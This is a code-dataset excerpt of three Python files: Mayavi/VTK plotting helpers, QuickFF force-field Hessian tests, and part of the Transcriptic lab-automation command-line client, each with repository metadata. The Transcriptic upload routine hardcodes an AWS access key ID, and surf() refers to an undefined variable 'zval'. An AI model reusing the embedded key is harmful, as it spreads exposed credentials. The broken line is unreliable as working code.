vtkConstants.VTK_UNSIGNED_INT = 7
vtkConstants.VTK_LONG = 8
vtkConstants.VTK_UNSIGNED_LONG = 9
vtkConstants.VTK_FLOAT =10
vtkConstants.VTK_DOUBLE =11
def array2vtk(z):
"""Converts a numpy Array to a VTK array object directly. The
resulting array copies the data in the passed array. The
array can therefore be deleted safely. This works for real arrays.
"""
arr_vtk = {'c':vtkConstants.VTK_UNSIGNED_CHAR,
'b':vtkConstants.VTK_UNSIGNED_CHAR,
'1':vtkConstants.VTK_CHAR,
's':vtkConstants.VTK_SHORT,
'i':vtkConstants.VTK_INT,
'l':vtkConstants.VTK_LONG,
'f':vtkConstants.VTK_FLOAT,
'd':vtkConstants.VTK_DOUBLE,
'F':vtkConstants.VTK_FLOAT,
'D':vtkConstants.VTK_DOUBLE }
# A dummy array used to create others.
f = vtk.vtkFloatArray()
# First create an array of the right type by using the typecode.
tmp = f.CreateDataArray(arr_vtk[z.dtype.char])
tmp.SetReferenceCount(2) # Prevents memory leak.
zf = N.ravel(z)
tmp.SetNumberOfTuples(len(zf))
tmp.SetNumberOfComponents(1)
tmp.SetVoidArray(zf, len(zf), 1)
# Now create a new array that is a DeepCopy of tmp. This is
# required because tmp does not copy the data from the NumPy array
# and will point to garbage if the NumPy array is deleted.
arr = f.CreateDataArray(arr_vtk[z.dtype.char])
arr.SetReferenceCount(2) # Prevents memory leak.
arr.DeepCopy(tmp)
return arr
def create_structured_points(x, y, z):
"""Creates a vtkStructuredPoints object given input data in the
form of numpy arrays.
Input Arguments:
x -- Array of x-coordinates. These should be regularly spaced.
y -- Array of y-coordinates. These should be regularly spaced.
z -- Array of z values for the x, y values given.
"""
nx = len(x)
ny = len(y)
nz = N.size(z)
assert nx*ny == nz, "len(x)*len(y) != len(z)"\
"You passed nx=%d, ny=%d, nz=%d"%(nx, ny, nz)
xmin, ymin = x[0], y[0]
dx, dy= (x[1] - x[0]), (y[1] - y[0])
sp = vtk.vtkStructuredPoints()
sp.SetDimensions(nx, ny, 1)
sp.SetOrigin(xmin, ymin, 0)
sp.SetSpacing(dx, dy, 1)
sc = array2vtk(z)
sp.GetPointData().SetScalars(sc)
return sp
def create_structured_points3D(x, y, z, s):
"""Creates a vtkStructuredPoints object given input data in the
form of numpy arrays.
Input Arguments:
x -- Array of x-coordinates. These should be regularly spaced.
y -- Array of y-coordinates. These should be regularly spaced.
z -- Array of y-coordinates. These should be regularly spaced.
s -- Array of scalar values for the x, y, z values given.
"""
nx = len(x)
ny = len(y)
nz = len(z)
ns = N.size(s)
assert nx*ny*nz == ns, "len(x)*len(y)*len(z) != len(s)"\
"You passed nx=%d, ny=%d, nz=%d, ns=%d"%(nx, ny, nz, ns)
xmin, ymin, zmin = x[0], y[0], z[0]
dx, dy, dz= (x[1] - x[0]), (y[1] - y[0]), (z[1] - z[0])
sp = vtk.vtkStructuredPoints()
sp.SetDimensions(nx, ny, nz)
sp.SetOrigin(xmin, ymin, zmin)
sp.SetSpacing(dx, dy, dz)
sc = array2vtk(s)
sp.GetPointData().SetScalars(sc)
return sp
def surf(x,y,z,warp=1, scale=[1.0, 1.0, 1.0], norm=0, viewer=None,
f_args=(), f_keyw={}):
"""3D surface plot of z, a 2D array"""
if norm:
x = (x-x.min())/(x.max()-x.min())
y = (y-y.min())/(y.max()-y.min())
z = (z-z.min())/(z.max()-z.min())
xs = x*scale[0]
ys = y*scale[1]
data = create_structured_points(xs, ys, z)
if not viewer:
v = mayavi.mayavi()
else:
v = viewer
v.open_vtk_data(data)
if warp:
f = v.load_filter('WarpScalar', 0)
f.fil.SetScaleFactor(scale[2])
n = v.load_filter('PolyDataNormals', 0)
n.fil.SetFeatureAngle(45)
m = v.load_module('SurfaceMap', 0)
if not viewer:
a = v.load_module('Axes', 0)
a.axes.SetCornerOffset(0.0)
if (min(scale) != max(scale)) or (scale[0] != 1.0):
a.axes.UseRangesOn()
a.axes.SetRanges(x[0], x[-1], y[0], y[-1], min(zval), max(zval))
o = v.load_module('Outline', 0)
v.Render()
return v
def isosurf(x,y,z,s, scale=[1.0, 1.0, 1.0, 1.0], norm=0, viewer=None,
f_args=(), f_keyw={}):
"""iso-surface plot of s, a 3D array,"""
if norm:
x = (x-x.min())/(x.max()-x.min())
y = (y-y.min())/(y.max()-y.min())
z = (z-z.min())/(z.max()-z.min())
xs = x*scale[0]
ys = y*scale[1]
zs = z*scale[2]
data = create_structured_points3D(xs, ys, zs, s)
if not viewer:
v = mayavi.mayavi()
else:
v = viewer
v.open_vtk_data(data)
m = v.load_module('IsoSurface')
if not viewer:
a = v.load_module('Axes', 0)
a.axes.SetCornerOffset(0.0)
if (min(scale) != max(scale)) or (scale[0] != 1.0):
a.axes.UseRangesOn()
a.axes.SetRanges(x[0], x[-1], y[0], y[-1], z[0], z[-1])
o = v.load_module('Outline', 0)
v.Render()
return v
def volume(x,y,z,s, scale=[1.0, 1.0, 1.0, 1.0], viewer=None,
f_args=(), f_keyw={}):
"""volume render s, a 3D array. s gets rescaled as an "unsigned
char" 0..127"""
xs = x*scale[0]
ys = y*scale[1]
zs = z*scale[2]
sscale = s.max() - s.min()
sd = ((s-s.min())*127/sscale).astype('b')
data = create_structured_points3D(xs, ys, zs, sd)
if not viewer:
v = mayavi.mayavi()
else:
v = viewer
v.open_vtk_data(data)
m = v.load_module('Volume')
if not viewer:
a = v.load_module('Axes', 0)
a.axes.SetCornerOffset(0.0)
if (min(scale) != max(scale)) or (scale[0] != 1.0):
a.axes.UseRangesOn()
a.axes.SetRanges(x[0], x[-1], y[0], y[-1], z[0], z[-1])
o = v.load_module('Outline', 0)
v.Render()
return v
|
martindurant/misc
|
mayatools.py
|
Python
|
mit
| 6,427
|
[
"Mayavi",
"VTK"
] |
6a04fc446c400a4003a8bb746962470a83db8bb8a5d6804c35d4cc3ef596cb98
|
# -*- coding: utf-8 -*-
# QuickFF is a code to quickly derive accurate force fields from ab initio input.
# Copyright (C) 2012 - 2019 Louis Vanduyfhuys <Louis.Vanduyfhuys@UGent.be>
# Steven Vandenbrande <Steven.Vandenbrande@UGent.be>,
# Jelle Wieme <Jelle.Wieme@UGent.be>,
# Toon Verstraelen <Toon.Verstraelen@UGent.be>, Center for Molecular Modeling
# (CMM), Ghent University, Ghent, Belgium; all rights reserved unless otherwise
# stated.
#
# This file is part of QuickFF.
#
# QuickFF is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# QuickFF is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
#--
from molmod.units import angstrom, kjmol, rad, deg
from molmod.ic import _dihed_angle_low, dihed_angle
from quickff.valence import ValenceFF
from quickff.settings import Settings
from quickff.tools import set_ffatypes
from itertools import permutations
from .common import log, read_system
import numpy as np
def check_terms(name):
'Check whether all ICs are present in ValenceFF instance'
#TODO: CROSS terms
with log.section('NOSETST', 2):
system, ref = read_system(name)
set_ffatypes(system, 'high')
valence = ValenceFF(system, Settings())
#check if every bond is present and harmonic
for bond in system.iter_bonds():
found = False
for term in valence.iter_terms('BONDHARM'):
at0, at1 = term.get_atoms()
if bond[0]==at0 and bond[1]==at1 \
or bond[0]==at1 and bond[1]==at0:
assert not found, 'BondHarm term %s was already found!' %str(bond)
found = True
assert found, 'No BondHarm term found for bond %s' %str(bond)
#check if every bend is present
for angle in system.iter_angles():
found = False
for term in valence.iter_terms('BENDAHARM'):
at0, at1, at2 = term.get_atoms()
if angle[0]==at0 and angle[1]==at1 and angle[2]==at2 \
or angle[0]==at2 and angle[1]==at1 and angle[2]==at0:
assert not found, 'BendAHarm term %s was already found!' %str(angle)
found = True
assert found, 'No BendAHarm term found for bond %s' %str(angle)
#check if every dihedral is present
for dihed in system.iter_dihedrals():
found = False
for term in valence.iter_terms('Tors'):
at0, at1, at2, at3 = term.get_atoms()
if dihed[0]==at0 and dihed[1]==at1 and dihed[2]==at2 and dihed[3]==at3\
or dihed[0]==at3 and dihed[1]==at2 and dihed[2]==at1 and dihed[3]==at0:
assert not found, 'Torsion term %s was already found!' %str(dihed)
found = True
assert found, 'No Torsion term found for bond %s' %str(dihed)
#check if every oop distance is present and Harm for rv of 0 and SQHARM else
for oop in system.iter_oops():
found = False
for term in valence.iter_terms('^OOPDIST/.*$', use_re=True):
at0, at1, at2, at3 = term.get_atoms()
for p0, p1, p2 in permutations([at0, at1, at2]):
if oop[0]==p0 and oop[1]==p1 and oop[2]==p2 and oop[3]==at3:
assert not found, 'OopDist term %s was already found!' %str(oop)
found = True
for term in valence.iter_terms('SQOOPDIST'):
at0, at1, at2, at3 = term.get_atoms()
for p0, p1, p2 in permutations([at0, at1, at2]):
if oop[0]==p0 and oop[1]==p1 and oop[2]==p2 and oop[3]==at3:
assert not found, 'SqOopDist term %s was already found!' %str(oop)
found = True
assert found, 'No (Sq)OopDist term found for bond %s (which is %s)' %(
str(oop),
' '.join([system.ffatypes[system.ffatype_ids[i]] for i in [at0,at1,at2,at3]])
)
def get_analytic_numeric_hessian(valence, term, **ffpars):
#setup ff
valence.set_params(term.index, **ffpars)
for term2 in valence.iter_terms():
assert len(term2.slaves)==0
if term2.index!=term.index:
valence.set_params(term2.index, rv0=0.0, fc=0.0)
#compute hcov using built-in function (which uses yaff routine)
ref = valence.get_hessian_contrib(term.index)
#compute hcov numerically using valence.calc_energy
eps = 1e-4
natoms = len(valence.system.pos)
num = np.zeros([3*natoms, 3*natoms], float)
for i in range(3*natoms):
Di = np.zeros(3*natoms, float)
Di[i] = eps
Di = Di.reshape([natoms, 3])
for j in range(3*natoms):
Dj = np.zeros(3*natoms, float)
Dj[j] = eps
Dj = Dj.reshape([natoms, 3])
tmp = valence.calc_energy(valence.system.pos + Di + Dj)
tmp -= valence.calc_energy(valence.system.pos + Di - Dj)
tmp -= valence.calc_energy(valence.system.pos - Di + Dj)
tmp += valence.calc_energy(valence.system.pos - Di - Dj)
num[i,j] = tmp/(2.0*eps)**2
num = 0.5*(num+num.T)
return ref, num
def get_indices_zero_nonzero(term, natoms):
'''
Return list of index tuples inonzero and izero:
inonzero: index tuples for which term contributes to the corresponding
Hessian element
izero : index tuples for which term does not contribute to the
corresponding Hessian element
'''
inonzero = [[],[]]
izero = [[],[]]
for i in range(natoms):
iindices = [3*i,3*i,3*i, 3*i+1,3*i+1,3*i+1, 3*i+2,3*i+2,3*i+2]
for j in range(natoms):
jindices = [3*j,3*j+1,3*j+2, 3*j,3*j+1,3*j+2, 3*j,3*j+1,3*j+2]
if i in term.get_atoms() and j in term.get_atoms():
inonzero[0] += iindices
inonzero[1] += jindices
else:
izero[0] += iindices
izero[1] += jindices
return inonzero, izero
def get_dihedral_angle(term, system):
dihed = term.get_atoms()
if system.cell.nvec>0:
d10 = system.pos[dihed[0]] - system.pos[dihed[1]]
d12 = system.pos[dihed[2]] - system.pos[dihed[1]]
d23 = system.pos[dihed[3]] - system.pos[dihed[2]]
system.cell.mic(d10)
system.cell.mic(d12)
system.cell.mic(d23)
return _dihed_angle_low(d10, d12, d23, 0)[0]
else:
rs = np.array([system.pos[j] for j in dihed])
return dihed_angle(rs)[0]
def check_hessian_bonds(name, tol=1e-3*kjmol/angstrom**2):
with log.section('NOSETST', 2):
system, ref = read_system(name)
set_ffatypes(system, 'highest')
valence = ValenceFF(system, Settings())
for term in valence.iter_terms('BONDHARM'):
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = np.random.uniform(low=1.00, high=2.00)*angstrom
fc = np.random.uniform(low=1000, high=3000)*kjmol/angstrom**2
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current bond
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (random FC=%8.3f kjmol/A^2 RV=%7.3f A ): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(term.basename, fc/(kjmol/angstrom**2), rv/angstrom, iM, jM, M/(kjmol/angstrom**2)))
assert M<tol
del system, valence, ref, num
def check_hessian_bends(name, tol=1e-3*kjmol/angstrom**2):
with log.section('NOSETST', 2):
system, ref = read_system(name)
set_ffatypes(system, 'highest')
valence = ValenceFF(system, Settings())
for term in valence.iter_terms('BENDAHARM'):
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = np.random.uniform(low=10, high=170)*deg
fc = np.random.uniform(low=100, high=1000)*kjmol/rad**2
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current bend
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (random FC=%8.3f kjmol/rad^2 RV=%7.3f deg): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(term.basename, fc/(kjmol/rad**2), rv/deg, iM, jM, M/(kjmol/angstrom**2)))
assert M<tol
del system, valence, ref, num
def check_hessian_dihedrals(name, tol=1e-3*kjmol/angstrom**2):
with log.section('NOSETST', 2):
system, ref = read_system(name)
set_ffatypes(system, 'highest')
valence = ValenceFF(system, Settings())
ref, num = None, None
for term in valence.iter_terms('TORS'):
psi0 = get_dihedral_angle(term, system)
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = np.random.uniform(low=0, high=180)*deg #q0
fc = np.random.uniform(low=10, high=50)*kjmol
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current dihedral
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (eq=%.1f deg random FC=%8.3f kjmol RV=%7.3f deg): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(
term.basename, psi0/deg, fc/kjmol, rv/deg, iM, jM, M/(kjmol/angstrom**2)
))
assert M<tol
del system, valence, ref, num
def check_hessian_oops(name, tol=1e-3*kjmol/angstrom**2):
with log.section('PROGRAM', 2):
system, ref = read_system(name)
set_ffatypes(system, 'highest')
valence = ValenceFF(system, Settings())
for term in valence.iter_terms('/OOPDIST'):
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = 0.0
fc = np.random.uniform(low=500, high=5000)*kjmol/angstrom**2
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current oop
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (random FC=%8.3f kjmol/A^2 RV=%7.3f A ): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(
term.basename, fc/(kjmol/angstrom**2), rv/angstrom, iM, jM, M/(kjmol/angstrom**2)
))
assert M<tol
del ref, num
for term in valence.iter_terms('SQOOPDIST'):
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = np.random.uniform(low=0.01, high=0.1)*angstrom**2
fc = np.random.uniform(low=500, high=5000)*kjmol/angstrom**4
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current oop
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (random FC=%8.3f kjmol/A^4 RV=%7.3f A^2): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(term.basename, fc/(kjmol/angstrom**4), rv/angstrom**2, iM, jM, M/(kjmol/angstrom**2)))
assert M<tol
del ref, num
del system, valence
def test_terms_water():
check_terms('water/gaussian.fchk')
def test_terms_methane():
check_terms('methane/gaussian.fchk')
def test_terms_ethene():
check_terms('ethene/gaussian.fchk')
def test_terms_ethanol():
check_terms('ethanol/gaussian.fchk')
def test_terms_amoniak():
check_terms('amoniak/gaussian.fchk')
def test_terms_benzene():
check_terms('benzene/gaussian.fchk')
def test_hessian_bonds_water():
check_hessian_bonds('water/gaussian.fchk')
def test_hessian_bends_water():
check_hessian_bends('water/gaussian.fchk')
def test_hessian_bonds_methane():
check_hessian_bonds('methane/gaussian.fchk')
def test_hessian_bends_methane():
check_hessian_bends('methane/gaussian.fchk')
def test_hessian_bonds_ethane():
check_hessian_bonds('ethane/gaussian.fchk')
def test_hessian_bends_ethane():
check_hessian_bends('ethane/gaussian.fchk')
def test_hessian_dihedrals_ethane():
check_hessian_dihedrals('ethane/gaussian.fchk')
def test_hessian_bonds_ethene():
check_hessian_bonds('ethene/gaussian.fchk')
def test_hessian_bends_ethene():
check_hessian_bends('ethene/gaussian.fchk')
def test_hessian_dihedrals_ethene():
check_hessian_dihedrals('ethene/gaussian.fchk')
def test_hessian_oops_ethene():
check_hessian_oops('ethene/gaussian.fchk')
def test_hessian_bonds_ethanol():
check_hessian_bonds('ethanol/gaussian.fchk')
def test_hessian_bends_ethanol():
check_hessian_bends('ethanol/gaussian.fchk')
def test_hessian_dihedrals_ethanol():
check_hessian_dihedrals('ethanol/gaussian.fchk')
def test_hessian_bonds_amoniak():
check_hessian_bonds('amoniak/gaussian.fchk')
def test_hessian_bends_amoniak():
check_hessian_bends('amoniak/gaussian.fchk')
def test_hessian_oops_amoniak():
check_hessian_oops('amoniak/gaussian.fchk')
def test_hessian_bonds_benzene():
check_hessian_bonds('benzene/gaussian.fchk')
def test_hessian_bends_benzene():
check_hessian_bends('benzene/gaussian.fchk')
def test_hessian_dihedrals_benzene():
check_hessian_dihedrals('benzene/gaussian.fchk')
def test_hessian_oops_benzene():
check_hessian_oops('benzene/gaussian.fchk')
|
molmod/QuickFF
|
quickff/tests/test_valence.py
|
Python
|
gpl-3.0
| 14,711
|
[
"Gaussian"
] |
4ab92d5381efcbaf779e8618a52cc426943c98c1833e8531b095126e738c4cea
|
import sys
import json
from os.path import expanduser, isfile
import locale
import ap2en
import click
import requests
from collections import OrderedDict
import zipfile
import os
import time
import xml.etree.ElementTree as ET
import re
# Workaround to support the correct input for both Python 2 and 3. Always use
# input() which will point to the correct builtin.
try:
input = raw_input
except NameError:
pass
class Config:
def __init__(self, api_root, email, token, organization):
self.api_root = api_root
self.email = email
self.token = token
self.organization = organization
@staticmethod
def from_file(path):
with click.open_file(expanduser(path), 'r') as f:
cfg = json.loads(f.read())
return Config(**cfg)
def save(self, path):
with click.open_file(expanduser(path), 'w') as f:
f.write(json.dumps({
'email': self.email,
'token': self.token,
'organization': self.organization,
'api_root': self.api_root,
}, indent=2))
def url(self, path):
return "%s/%s/%s" % (self.api_root, self.organization, path)
def post(self, path, **kwargs):
default_headers = {
'X-User-Email': self.email,
'X-User-Token': self.token,
'Content-Type': 'application/json',
'Accept': 'application/json',
}
default_headers.update(kwargs.pop('headers', {}))
return requests.post(self.url(path), headers=default_headers, **kwargs)
def get(self, path, **kwargs):
default_headers = {
'X-User-Email': self.email,
'X-User-Token': self.token,
'Content-Type': 'application/json',
'Accept': 'application/json',
}
default_headers.update(kwargs.pop('headers', {}))
return requests.get(self.url(path), headers=default_headers, **kwargs)
@click.group()
@click.option('--apiroot', default=None)
@click.option('--config',
envvar='TRANSCRIPTIC_CONFIG',
default='~/.transcriptic',
help='Specify a configuration file')
@click.option('--organization', '-o', default=None, help='The organization to associate your login with')
@click.pass_context
def cli(ctx, apiroot, config, organization):
'''A command line tool for submitting protocols to Transcriptic and more'''
if ctx.invoked_subcommand not in ['login', 'preview', 'run']:
try:
ctx.obj = Config.from_file(config)
if organization is not None:
ctx.obj.organization = organization
if apiroot is not None:
ctx.obj.api_root = apiroot
except IOError:
click.echo("Error reading config file, running "
"`transcriptic login` ...")
ctx.invoke(login)
@cli.command()
@click.argument('file', default='-')
@click.option('--project', '-p',
metavar='PROJECT_ID',
required=True, help='Project id or name to submit the run to. '
'use transcriptic projects command to list'
' existing projects.')
@click.option('--title', '-t', help='Optional title of your run')
@click.option('--test', help='Submit this run in test mode', is_flag=True)
@click.pass_context
def submit(ctx, file, project, title, test):
'''Submit your run to the project specified'''
project = get_project_id(project)
if not project:
return
with click.open_file(file, 'r') as f:
try:
protocol = json.loads(f.read())
except ValueError:
click.echo("Error: Could not submit since your manifest.json file is "
"improperly formatted.")
return
if test:
test = True
response = ctx.obj.post(
'%s/runs' % project,
data=json.dumps({
"title": title,
"protocol": protocol,
"test_mode": test
}))
if response.status_code == 201:
click.echo(
"Run created: %s" %
ctx.obj.url("%s/runs/%s" % (project, response.json()['id'])))
return response.json()['id']
elif response.status_code == 404:
click.echo("Error: Couldn't create run (404). \nAre you sure the project %s "
"exists, and that you have access to it?" %
ctx.obj.url(project))
elif response.status_code == 422:
click.echo("Error creating run: %s" % response.text)
else:
click.echo("Unknown error: %s" % response.text)
@cli.command()
@click.argument('package', required=False)
@click.option('--name', '-n', help="Optional name for your zip file")
@click.pass_context
def release(ctx, name=None, package=None):
'''Compress the contents of the current directory to upload as a release'''
deflated = zipfile.ZIP_DEFLATED
def makezip(d, archive):
for (path, dirs, files) in os.walk(d):
for f in files:
if ".zip" not in f:
archive.write(os.path.join(path, f))
return archive
with open('manifest.json', 'rU') as manifest:
filename = 'release_v%s' %json.load(manifest)['version'] or name
if os.path.isfile(filename + ".zip"):
new = click.prompt("You already have a release for this "
"version number in this directory, make "
"another one? [y/n]",
default = "y")
if new == "y":
num_existing = sum([1 for x in os.listdir('.') if filename in x])
filename = filename + "-" + str(num_existing)
else:
return
click.echo("Compressing all files in this directory...")
zf = zipfile.ZipFile(filename + ".zip", 'w', deflated)
archive = makezip('.', zf)
zf.close()
click.echo("Archive %s created." % (filename + ".zip"))
if package:
package_id = get_package_id(package) or get_package_name(package)
ctx.invoke(upl, archive=(filename + ".zip"), package=package_id)
@cli.command("upload")
@click.argument('archive', required=True, type=click.Path(exists=True))
@click.argument('package', required=True)
@click.pass_context
def upl(ctx, archive, package):
"""Upload an existing archive to an existing package"""
try:
package_id = get_package_id(package.lower()) or get_package_name(package.lower())
click.echo("Uploading %s to %s" % (archive,
(get_package_name(package_id.lower()) or
get_package_id(package_id.lower()))))
except AttributeError:
click.echo("Error: Invalid package id or name.")
return
with click.progressbar(None, 100, "Upload Progress",
show_eta = False, width=70,
fill_char = "|", empty_char= "-") as bar:
bar.update(10)
sign = requests.get('https://secure.transcriptic.com/upload/sign',
params={
'name': archive
},
headers={
'X-User-Email': ctx.obj.email,
'X-User-Token': ctx.obj.token,
'Content-Type': 'application/json',
'Accept': 'application/json',
})
info = json.loads(sign.content)
bar.update(30)
url = 'https://transcriptic-uploads.s3.amazonaws.com'
files = {'file': open(os.path.basename(archive), 'rb')}
data = OrderedDict([
('key', info['key']),
('AWSAccessKeyId', 'AKIAJVJ67EJYCQXO7ZSQ'),
('acl', 'private'),
('success_action_status', '201'),
('policy', info['policy']),
('signature', info['signature']),
])
response = requests.post(url, data=data, files=files)
bar.update(20)
response_tree = ET.fromstring(response.content)
loc = dict((i.tag, i.text) for i in response_tree)
try:
up = ctx.obj.post('/packages/%s/releases/' % package_id,
data = json.dumps({"release":
{
"binary_attachment_url": loc["Key"]
}
}),
headers= {
"Origin": "https://secure.transcriptic.com/",
"Content-Type": "application/json"
})
re = json.loads(up.content)['id']
except ValueError:
click.echo("\nError: There was a problem uploading your release. \nVerify"
" that your manifest.json file is properly formatted and"
" that all previews in your manifest produce valid "
"Autoprotocol by using the `transcriptic preview` "
"and/or `transcriptic analyze` commands.")
return
bar.update(20)
time.sleep(10)
status = ctx.obj.get('/packages/%s/releases/%s?_=%s' % (package_id, re,
int(time.time())))
published = json.loads(status.content)['published']
errors = status.json()['validation_errors']
bar.update(30)
if errors:
click.echo("\nPackage upload to %s unsuccessful. "
"The following error was "
"returned: %s" %
(get_package_name(package_id),
(',').join(e.get('message', '[Unknown]') for
e in errors)))
else:
click.echo("\nPackage uploaded successfully! \n"
"Visit %s to publish." % ctx.obj.url('packages/%s' %
package_id))
@cli.command()
@click.pass_context
@click.option("-i")
def packages(ctx, i):
'''List packages in your organizaiton'''
response = ctx.obj.get('/packages/')
package_names = {}
if response.status_code == 200:
for pack in response.json():
package_names[str(pack['name']).lower().replace("com.%s." % ctx.obj.organization, "")] = str(pack['id'])
if i:
return package_names
else:
click.echo('{:^40}'.format("PACKAGE NAME") + "|" +
'{:^40}'.format("PACKAGE ID"))
click.echo('{:-^80}'.format(''))
for name, id in package_names.items():
click.echo('{:<40}'.format(name) + "|" +
'{:^40}'.format(id))
click.echo('{:-^80}'.format(''))
@cli.command("new-package")
@click.argument('name')
@click.argument('description')
@click.pass_context
def new_package(ctx, description, name):
'''Create a new empty protocol package'''
existing = ctx.obj.get('/packages/')
for p in existing.json():
if name == p['name'].split('.')[-1]:
click.echo("You already have an existing package with the name \"%s\"."
" Please choose a different package name." % name)
return
new_pack = ctx.obj.post('/packages/',
data = json.dumps({"description": description,
"name": "%s%s" % ("com.%s." % ctx.obj.organization, name)
}))
if new_pack.status_code == 201:
click.echo("New package %s created with id %s \n"
"View it at %s" % (name, new_pack.json()['id'],
ctx.obj.url('packages/%s' %
new_pack.json()['id'])))
else:
click.echo("There was an error creating this package.")
@cli.command()
@click.pass_context
@click.option("-i")
def projects(ctx, i):
'''List the projects in your organization'''
response = ctx.obj.get('')
proj_names = {}
if response.status_code == 200:
for proj in response.json()['projects']:
proj_names[proj['name']] = proj['id']
if i:
return {k.lower(): v for k,v in proj_names.items()}
else:
click.echo('{:^35}'.format("PROJECT NAME") + "|" +
'{:^35}'.format("PROJECT ID"))
click.echo('{:-^70}'.format(''))
for name, i in proj_names.items():
click.echo('{:<35}'.format(name) + "|" +
'{:^35}'.format(i))
click.echo('{:-^70}'.format(''))
else:
click.echo("There was an error listing the projects in your "
"organization. Make sure your login details are correct.")
@cli.command("new-project")
@click.argument('name')
@click.pass_context
def new_project(ctx, name):
'''Create a new empty project'''
existing = ctx.obj.get('')
for p in existing.json()['projects']:
if name == p['name'].split('.')[-1]:
click.echo("You already have an existing project with the name \"%s\"."
" Please choose a different project name." % name)
return
new_proj = ctx.obj.post('',
data= json.dumps({
"name": name
})
)
if new_proj.status_code == 201:
click.echo("New project '%s' created with id %s \nView it at %s" %
(name, new_proj.json()['id'],
ctx.obj.url('projects/%s' % new_proj.json()['id'])))
else:
click.echo("There was an error creating this package.")
@cli.command()
def init():
'''Initialize directory with blank manifest.json file'''
manifest_data = {
"version": "1.0.0",
"format": "python",
"license": "MIT",
"protocols": [
{
"name": "SampleProtocol",
"description": "This is a protocol.",
"command_string": "python sample_protocol.py",
"preview": {
"refs":{},
"parameters": {}
},
"inputs": {},
"dependencies": []
}
]
}
if isfile('manifest.json'):
click.confirm("This directory already contains a manifest.json file, "
"would you like to overwrite it with an empty one? ",
default = False,
abort = True)
with open('manifest.json', 'w+') as f:
click.echo('Creating empty manifest.json...')
f.write(json.dumps(manifest_data, indent=2))
click.echo("manifest.json created")
@cli.command()
@click.argument('file', default='-')
@click.option('--test', help='Analyze this run in test mode', is_flag=True)
@click.pass_context
def analyze(ctx, file, test):
'''Analyze autoprotocol'''
with click.open_file(file, 'r') as f:
try:
protocol = json.loads(f.read())
except ValueError:
click.echo("Error: Could not analyze since your manifest.json file is "
"improperly formatted.")
return
response = \
ctx.obj.post(
'analyze_run',
data=json.dumps({"protocol": protocol, "test_mode": test})
)
if response.status_code == 200:
click.echo(u"\u2713 Protocol analyzed")
price(response.json())
elif response.status_code == 422:
click.echo("Error in protocol: %s" % response.text)
else:
click.echo("Unknown error: %s" % response.text)
def price(response):
def count(thing, things, num):
click.echo(" %s %s" % (num, thing if num == 1 else things))
count("instruction", "instructions", len(response['instructions']))
count("container", "containers", len(response['refs']))
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
click.echo(" %s" %
locale.currency(float(response['total_cost']), grouping=True))
for w in response['warnings']:
message = w['message']
if 'instruction' in w['context']:
context = "instruction %s" % w['context']['instruction']
else:
context = json.dumps(w['context'])
click.echo("WARNING (%s): %s" % (context, message))
@cli.command()
@click.argument('protocol_name')
def preview(protocol_name):
'''Preview the Autoprotocol output of a script'''
with click.open_file('manifest.json', 'r') as f:
try:
manifest = json.loads(f.read())
except ValueError:
click.echo("Error: Your manifest.json file is improperly formatted. "
"Please double check your brackets and commas!")
return
try:
p = next(p for p in manifest['protocols'] if p['name'] == protocol_name)
except StopIteration:
click.echo("Error: The protocol name '%s' does not match any protocols "
"that can be previewed from within this directory. \nCheck "
"either your protocol's spelling or your manifest.json file "
"and try again." % protocol_name)
return
try:
command = p['command_string']
except KeyError:
click.echo("Error: Your manifest.json file does not have a \"command_string\""
" key.")
return
from subprocess import call
import tempfile
with tempfile.NamedTemporaryFile() as fp:
try:
fp.write(json.dumps(p['preview']))
except KeyError:
click.echo("Error: The manifest.json you're trying to preview doesn't "
